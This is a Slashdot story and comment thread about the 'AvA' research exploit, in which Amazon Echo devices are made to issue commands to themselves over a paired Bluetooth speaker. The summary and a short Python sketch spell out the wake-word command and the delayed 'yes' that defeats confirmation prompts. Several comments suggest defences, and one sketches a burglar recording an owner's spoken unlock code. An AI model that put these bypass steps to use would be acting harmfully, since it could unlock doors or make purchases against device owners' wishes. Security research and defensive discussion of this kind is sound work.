Security

Attackers Can Force Amazon Echos To Hack Themselves With Self-Issued Commands (arstechnica.com)

Academic researchers have devised a new working exploit that commandeers Amazon Echo smart speakers and forces them to unlock doors, make phone calls and unauthorized purchases, and control furnaces, microwave ovens, and other smart appliances. joshuark shares a report: The attack works by using the device's speaker to issue voice commands. As long as the speech contains the device wake word (usually "Alexa" or "Echo") followed by a permissible command, the Echo will carry it out, researchers from Royal Holloway, University of London and Italy's University of Catania found. Even when devices require verbal confirmation before executing sensitive commands, it's trivial to bypass the measure by adding the word "yes" about six seconds after issuing the command. Attackers can also exploit what the researchers call the "FVV," or full volume vulnerability, which allows Echos to make self-issued commands without temporarily reducing the device volume.
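
The command-then-confirm timing is simple enough to sketch. Below is a minimal illustration of the pattern the researchers describe, not their code: it uses the pyttsx3 text-to-speech library as a stand-in for audio played through the Echo's own speaker, and the specific command is hypothetical. Something to try only against a device you own.

```python
# Minimal sketch of the self-issued command pattern from the article, using
# an ordinary TTS library (pyttsx3) as a stand-in for the Echo's own speaker.
# The wake word, command, and six-second delay come from the article;
# everything else is illustrative.
import time
import pyttsx3

engine = pyttsx3.init()

def speak(phrase: str) -> None:
    """Render a phrase as speech through the local audio output."""
    engine.say(phrase)
    engine.runAndWait()

# Wake word plus a sensitive command.
speak("Alexa, unlock the front door")

# Per the researchers, a "yes" about six seconds later is enough to
# defeat the verbal-confirmation prompt for sensitive commands.
time.sleep(6)
speak("yes")
```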

Because the hack uses Alexa functionality to force devices to make self-issued commands, the researchers have dubbed it "AvA," short for Alexa vs. Alexa. It requires only a few seconds of proximity to a vulnerable device while it's turned on so an attacker can utter a voice command instructing it to pair with an attacker's Bluetooth-enabled device. As long as the device remains within radio range of the Echo, the attacker will be able to issue commands. The attack "is the first to exploit the vulnerability of self-issuing arbitrary commands on Echo devices, allowing an attacker to control them for a prolonged amount of time," the researchers wrote in a paper [PDF] published two weeks ago. "With this work, we remove the necessity of having an external speaker near the target device, increasing the overall likelihood of the attack."


Comments Filter:
  • I've looked into smart locks (I admit, I don't own one), but most of them require a PIN if you're unlocking via voice on Google smart speakers -- does Alexa not have this basic functionality?

    • Not having looked into the question for 20-odd years (and none of the reliability issues have changed since then), I don't know how these things are meant to work now. When I last looked at it, electronic door locks were one thing, and how you drove the "unlatch" line was up to you - padlocked switch, highly trained wombat, whatever.

      Are Amazon (or Google - and whoever else is in this market) now selling their own lines of integrated home automation products? With their reputation for sloppy, insecure programming ...

  • So if you want the Echo to unlock the front door, you can get inside first, pair your phone with the device when the owner isn't paying attention, then later use it to send commands to do things like unlock the door. So either you've already broken in, or you've been allowed in at some point.

    But if the front door lock is controlled by the Echo, just move to the nearest window to the device and yell at it. You'll get enough sound through the window to activate it, and it will let you in. Much simpler.

    • by hab136 ( 30884 )

      >But if the front door lock is controlled by the Echo, just move to the nearest window to the device and yell at it.

      There's a toggle in Alexa for my smart lock that controls whether it can be unlocked by voice. It's off by default and gives you a big warning if you try to enable it.

      If you do ignore the warning and enable unlocking by voice, you have to also set a 4-digit "voice confirmation code".

      So yes, yelling attacks will work... if the attacker also yells the PIN, and the homeowner has turned that feature on ...
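
The gate described above is easy to picture in code. A hypothetical sketch, with made-up names and structure rather than Amazon's actual implementation:

```python
# Hypothetical sketch of a voice-unlock gate: disabled by default, and
# requiring a spoken 4-digit confirmation code once enabled. Not Amazon's
# actual implementation; names and structure are illustrative.
from dataclasses import dataclass
from typing import Optional

@dataclass
class VoiceLockConfig:
    voice_unlock_enabled: bool = False          # off by default
    confirmation_code: Optional[str] = None     # set when the user opts in

def handle_unlock_request(config: VoiceLockConfig, spoken_code: Optional[str]) -> str:
    if not config.voice_unlock_enabled:
        return "Voice unlock is disabled for this lock."
    if spoken_code is None or spoken_code != config.confirmation_code:
        return "Confirmation code missing or incorrect; door stays locked."
    return "Unlocking the door."

# An attacker yelling through the window also has to yell the right code:
config = VoiceLockConfig(voice_unlock_enabled=True, confirmation_code="4921")
print(handle_unlock_request(config, spoken_code="0000"))  # door stays locked
```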

      • That "yelling the confirmation code on your front doorstep is a bit of a weak point.
        • Burglar sees a rich-looking house while scouting an area.
        • Burglar clutches a copy of "Murderer for Jesus" or some such pamphlet in one hand, and a covert Voice-Activated Recorder (VAR) in the other.
        • Rings the doorbell, crouches down to fiddle with shoelaces with one hand - and places the VAR with the other.
        • If someone answers the door - or a nosy neighbour intervenes - burglar spins a line about "Suicide for God" or something equally plausible until the ...
  • Alexa. Say, "Alexa."

    --
    "10 Goto 10" - Everybody

    • It'll tell you how to pronounce "Alexa"
    • Another way to combat this exploit is to change the wake word for Alexa. By going into the settings, you can change the wake word from Alexa to Ziggy, Echo, Amazon or Computer. You have to do this to each device separately but it stops inadvertent triggering from the TV, radio, or video calls.

  • Alexa, kill Kenny

  • Any attack that requires physical or nearby access is both obvious and unimportant.
  • Alexa, go to DEFCON 1!

  • Read it carefully. What the headline gives, the details cancel.

    The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth, they're close enough for all kinds of other attacks, and the device hasn't been secured to begin with. So step 1 of the attack is to have an insecure device. Plenty of those are out there with default passwords and all, but that's not much of a vulnerability. Might as well say that systems with passwords like "password" allow for easy break-ins.

    After they've attached to the device that wasn't secured, the attack uses text-to-speech -- and the defense can follow a pattern the device makers have already implemented from time to time, such as limiting specific frequencies. That's how they got it to stop responding to commercials that shouted "hey, Alexa!": the commercials wouldn't use those frequencies, so the device would recognize it wasn't an actual human. The same could be done with the speakers -- and has been done in many other voice-recognizing machines -- by simply not outputting those frequencies. A little coordination with the other smart speaker makers and they could all agree on a list of frequencies to omit, securing them against device-to-device attacks.
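
The band-limiting idea in the comment above can be sketched in a few lines. A minimal illustration with numpy; the 6-7 kHz "marker" band and the threshold are arbitrary stand-ins, since real ad-audio fingerprinting is more sophisticated than a single band check:

```python
# Minimal sketch of frequency-based filtering: reject audio whose spectrum
# lacks energy in a band that live speech would contain but that cooperating
# broadcasters would notch out. Band and threshold are illustrative.
import numpy as np

SAMPLE_RATE = 16_000  # Hz, typical for voice capture

def band_energy(audio: np.ndarray, low_hz: float, high_hz: float) -> float:
    """Fraction of total spectral energy inside [low_hz, high_hz]."""
    spectrum = np.abs(np.fft.rfft(audio)) ** 2
    freqs = np.fft.rfftfreq(len(audio), d=1.0 / SAMPLE_RATE)
    mask = (freqs >= low_hz) & (freqs <= high_hz)
    return spectrum[mask].sum() / spectrum.sum()

def looks_like_live_speech(audio: np.ndarray) -> bool:
    # Hypothetical rule: demand some energy in a 6-7 kHz "marker" band.
    return band_energy(audio, 6_000, 7_000) > 0.01

# Synthetic check: a 6.5 kHz tone passes, a 440 Hz tone does not.
t = np.arange(SAMPLE_RATE) / SAMPLE_RATE
print(looks_like_live_speech(np.sin(2 * np.pi * 6_500 * t)))  # True
print(looks_like_live_speech(np.sin(2 * np.pi * 440 * t)))    # False
```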

    The "mask attack" they describe is a security flaw that should be addressed, but it's a MitM attack requiring the connection to an already compromised device. If you've already breached the insecure device, further attacks that rely on the breach aren't that big of news.

    • The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth, they're close enough for all kinds of other attacks, and the device hasn't been secured to begin with. So step 1 of the attack is to have an insecure device.

      I think you're missing the point: Bluetooth-pair once while you're inside the home, and then you can control the device from outside the home at Bluetooth range, say from the front porch.

      What other attacks are we comparing this to inside the house? Someone making a copy of your house keys, or leaving a back window unlocked?

      I don't think a new vector on par with those, one most people are unaware of, is something to brush off. People are at least aware of the leave-a-window-unlocked trick. Copying a key is too much effort ...

      • by nasch ( 598556 )

        Seems like there should be some kind of code required to pair to the smart device, just like there is for wifi. Rather than letting just anyone in range control a security system.

        • by ufgrat ( 6245202 )

          Oh, there is. Bluetooth pairing requires a PIN of at least 4 digits. Unfortunately, because most people are stupid and can't manage to remember a 4-digit number, most devices default to "0000" or "1234", thereby rendering the security step completely irrelevant.
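
To put numbers on that: the whole 4-digit space is small even when the PIN isn't a default. A quick back-of-the-envelope, where the attempt rate is an assumption:

```python
# Back-of-the-envelope for the parent's point: a 4-digit Bluetooth PIN is a
# tiny search space, and the common defaults shrink it to a couple of
# guesses. The attempt rate here is an illustrative assumption.
pin_space = 10 ** 4                      # 0000-9999
common_defaults = ["0000", "1234"]       # tried first by any attacker

attempts_per_second = 10                 # assumed pairing-attempt rate
worst_case_minutes = pin_space / attempts_per_second / 60
print(f"{pin_space} PINs; ~{worst_case_minutes:.0f} minutes to brute-force "
      f"at {attempts_per_second}/s, or ~instant if the PIN is one of "
      f"{common_defaults}.")
```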

    • According to my wife, who trusts Alexa enough to have one in just about every room in the house (but not my office, thankyouverymuch), you don't "pair" your phone with the Echo at all. You have to install their app onto your phone and then use the app to log in to the device owner's account. So no, Alexa doesn't just randomly pair with any phone within range.

      If you are so vulnerable that an intruder could gain physical access to your Echo device and get hold of your Amazon login credentials, you have bigger problems ...

    • by gweihir ( 88907 )

      Read it carefully. What the headline gives, the details cancel.

      The attack begins by first being able to connect your attacking device by Bluetooth. If the person can already attach to Bluetooth, they're close enough for all kinds of other attacks, and the device hasn't been secured to begin with.

      Pretty much doable by a hacked smartphone that was left close enough. Many people will have set up a pairing already, so this is not an exotic attack.

    • by sperm ( 916223 )

      While not perfect and by no means stopping this kind of attack, setting up and using Alexa Guard can be useful.

    • such as limiting specific frequencies. That's how they got it to stop responding to commercials that shouted "hey, Alexa!": the commercials wouldn't use those frequencies, so the device would recognize it wasn't an actual human.

      So, people with a variety of non-standard speech profiles won't be able to use Alexa. Big fucking surprise there.

      And you've a tremendous confidence in the accuracy of speakers in general and their ability to not impose their own frequency shifts and blurring on imposed signals. ...

  • Ok then. Thanks for wasting my time.
  • I don't want any voice-enabled or even smart devices in my house. Who's laughing now? Common sense wins again.

  • Any halfway sane design would prevent self-commanding. Apparently, Alexa is designed by amateurs with not the least clue about real-world IT security. My take is that it only took so long to find this because nobody expected a flaw this exceptionally stupid.

    • It seems that the Alexa designers want to have voice commands from authorised users (as a product feature) but not have voice commands from unauthorised users. That means an authorisation-checking stage, and quite early in the process.

      Typically authorisation depends on something the authorised know (e.g. passwords) or have (RFID, NFC, or even Bluetooth tokens) which the unauthorised don't know or have. From discussions upthread, this Bluetooth authorisation thing seems to at least attempt that, if not necessarily ...
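
A minimal sketch of the "something you have" half of that, with a made-up presence scan and token list rather than any real Alexa mechanism:

```python
# Hypothetical sketch of possession-based authorisation: sensitive commands
# only run while an enrolled trusted token (here identified by a Bluetooth
# MAC) is in range. The enrollment list and presence scan are stand-ins,
# not any real Alexa mechanism.
TRUSTED_TOKENS = {"AA:BB:CC:DD:EE:FF"}   # enrolled during setup
SENSITIVE_INTENTS = {"unlock_door", "disarm_alarm"}

def devices_in_range() -> set[str]:
    """Stand-in for a real BLE presence scan."""
    return {"AA:BB:CC:DD:EE:FF"}

def authorize(intent: str) -> bool:
    if intent not in SENSITIVE_INTENTS:
        return True                       # ordinary commands need no token
    return bool(TRUSTED_TOKENS & devices_in_range())

print(authorize("play_music"))   # True: not sensitive
print(authorize("unlock_door"))  # True only while the token is present
```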

  • Anybody who's spoken to Alexa Ray Joel (one-hit wonder in the US, and daughter of singer Billy Joel) knows she yells commands at your Alexa whenever she talks on the phone, because the caller might slip, say her name, and fire up their Alexa device while talking to her. I'm sure all girls named Alexa do the same thing...

  • No smart devices in my home; no way I'm allowing any possible hacking, listening, tattling, or observing by smart devices!
